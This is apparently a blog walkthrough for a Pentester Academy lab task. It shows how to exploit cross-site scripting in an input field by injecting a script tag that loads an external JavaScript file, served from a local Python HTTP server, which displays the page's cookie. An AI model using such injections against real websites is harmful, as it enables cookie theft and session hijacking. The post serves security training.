Hello Pentesters, today I am going to post another solution to the task provided at Javascript for Pentester at Pentester Academy. In this task, we will learn how to use external javascript with unlimited space to code. You can view solutions to the other tasks here.
Task 9: Include External JS | Task Link
This task is very easy we have to put an alert box with the cookie inside it through an external javascript code. This comes in handy when we don’t have much space for our script to execute due to limitations applied on the server side of the page.
Solution:
Find our injection point first, in this case, we found that input field is vulnerable to XSS. First, try some short injections like “<script>alert(0)</script>” and see the injection happens, which may lead to go ahead and insert our external javascript in the injection point. For this attack, you have to start your simple HTTP Server in python.
python -m http.server // for Python 3.X python -m SimpleHTTPServer // for Python 2.X
After that write a javascript code and save it into the directory where your simple HTTP server is running. The code inside the javascript file does not need to be inside the <script> tags.
alert(document.cookie);
Our actual injection will look like this:
<script src='http://localhost:8000/j.js'></script>
Where j.js is our javascript file name. Now copy and paste the code above into the input field of the targeted page.
That’s all. Refer this post as a quick solution for the Javascript for Pentester tasks. For an in-depth video tutorial, please refer to the video solutions provided at Pentester Academy website.
